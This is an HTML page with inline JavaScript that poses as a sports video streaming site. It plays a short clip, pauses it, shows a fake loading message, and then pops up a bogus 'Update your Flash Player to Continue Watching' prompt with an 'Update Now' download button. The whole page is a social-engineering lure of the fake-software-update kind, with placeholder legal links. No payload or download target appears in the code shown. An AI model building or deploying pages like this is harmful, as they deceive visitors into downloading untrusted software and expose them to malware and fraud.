<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>FP - Sport</title>
    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,600" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css?family=Open+Sans:800" rel="stylesheet">
    <link rel="stylesheet" href="style.css">
</head>

<body>
<section id="top-bar">
    <img class="logo" src="img/header-logo.png" srcset="img/header-logo@2x.png 2x, img/header-logo@3x.png 3x"
         alt="logo">
    <div class="text">Baseball</div>
    <div class="line">|</div>
    <div class="text">Basketball</div>
    <div class="line">|</div>
    <div class="text">Boxing</div>
    <div class="line">|</div>
    <div class="text">Cricket</div>
    <div class="line">|</div>
    <div class="text">Football</div>
    <div class="line">|</div>
    <div class="text">Formula</div>
    <div class="line">|</div>
    <div class="text">Hockey</div>
    <div class="line">|</div>
    <div class="text">NFL</div>
    <div class="line">|</div>
    <div class="text">Tennis</div>
    <div class="line">|</div>
    <div class="text">Other</div>
</section>

<div class="page-title">Football</div>

<section class="container">
    <div class="player-window">
        <div class="video-container">
            <video id="my-video" autoplay>
                <source src="img/video.mp4" type="video/mp4">
            </video>
            <div id="video-overlay" class="video-overlay"></div>
            <div class="progress-line">
                <div id="progress-red-line" class="progress-red-line"></div>
                <div class="video-scrubber">
                    <img id="video-scrubber" src="img/timer.png" alt="timer">
                </div>
                <div id="progress-grey-line" class="progress-grey-line"></div>
            </div>
            <div class="video-control">
                <div class="left-controls row">
                    <img id="video-control-button" class="video-control-button btn-play" src="img/pause.png" alt="play">
                    <img class="video-control-button btn-speaker" src="img/speaker.png" alt="speaker">
                </div>
                <div class="right-controls row">
                    <img class="video-control-button btn-clock" src="img/clock.png" alt="clock">
                    <img class="video-control-button btn-gear" src="img/gear.png" alt="gear">
                    <img class="video-control-button btn-frame" src="img/frame.png" alt="frame">
                    <img class="video-control-button btn-broken-frame" src="img/broken-frame.png" alt="broken-frame">
                </div>
            </div>
        </div>
        <div id="first-context" class="context hidden">
            <div class="text">
                Loading...100%<br>
                Connecting to content
            </div>
            <div class="preloader">
                <img id="preloader" src="img/preloader.gif" alt="preloader">
            </div>
        </div>
        <div id="second-context" class="context hidden">
            <div class="title-block">Software Update</div>
            <div class="title">Update your Flash Player to Continue Watching</div>
            <div class="text">
                You might be using an old version of Flash Player Update to the latest version in order to continue.
            </div>
            <button id="download" class="download-button-block act btn">Update Now</button>
        </div>
    </div>
</section>
<section id="footer" class="fixed-bottom">
    <a class="footer-links" href="" target="_self">Privacy Policy</a>
    <a class="footer-links" href="" target="_self">EULA</a>
</section>

<script src="https://code.jquery.com/jquery-3.1.1.min.js"
        integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8="
        crossorigin="anonymous"></script>
<script>
    changePlayer();

    window.onresize = function () {
        changePlayer();
    };

    let bodyId = document.getElementsByTagName('body')[0];
    let videoId = document.getElementById("my-video");
    let progressGreyLineId = document.getElementById("progress-grey-line");
    let progressRedLineId = document.getElementById("progress-red-line");

    bodyId.style.visibility = 'hidden';
    var readyStateCheckInterval = setInterval(function () {
        if (document.readyState === "complete") {
            clearInterval(readyStateCheckInterval);
            bodyId.style.visibility = 'visible';
            videoId.autoplay = true;
            videoId.muted = true;
            videoId.load();

            progressRedLineId.style.width = `0px`;
            let progressRedLine = setInterval(() => {
                let progressRedLineWidth = parseFloat(progressRedLineId.style.width);
                let progressGreyLineWidth = parseFloat(progressGreyLineId.style.width);

                progressRedLineId.style.width = `${progressRedLineWidth + 0.2}px`;
                progressGreyLineId.style.width = `${progressGreyLineWidth - 0.2}px`;
            }, 100);

            progressGreyLineId.style.width = `71px`;
            let progressGreyLine = setInterval(() => {
                let progressWidth = parseFloat(progressGreyLineId.style.width);
                let progressMaxWidth = parseFloat(progressGreyLineId.style.maxWidth);

                progressGreyLineId.style.width = `${progressWidth + 30}px`;
                if (progressWidth === progressMaxWidth) {
                    clearInterval(progressGreyLine);
                }
            }, 1500);

            window.setTimeout(function () {
                clearInterval(progressRedLine);
                videoId.pause();
                document.getElementsByTagName('video')[0].className += ' video-opacity';
                document.getElementById('first-context').className += ' visible';
                document.getElementById('video-control-button').setAttribute('src', 'img/play.png');
            }, 3000);

            window.setTimeout(function () {
                document.getElementById('first-context').remove('visible');
            }, 5400);

            window.setTimeout(function () {
                document.getElementById('second-context').className += ' visible';
            }, 5410);
        }
    }, 10);

    function changePlayer() {
        let windowHeight = window.innerHeight;
        let newPaddingTop = 15;
        let newTittlePadding = 55;

        if (windowHeight <= 825) {
            newPaddingTop = (windowHeight - 825) / 3 + 95;
            newTittlePadding = (windowHeight - 825) / 4 + 55;
        } else if (windowHeight < 880) {
            newPaddingTop = windowHeight - 880 + 15;
            newTittlePadding = windowHeight - 880 + 55;
        }

        newPaddingTop = newPaddingTop < 0 ? 0 : newPaddingTop;
        newTittlePadding = newTittlePadding < 0 ? 0 : newTittlePadding;
        $('.player-window').css('padding-top', newPaddingTop + 'px');
        $('.page-title').css('padding-top', newTittlePadding + 'px');
    }
</script>
</body>

</html>
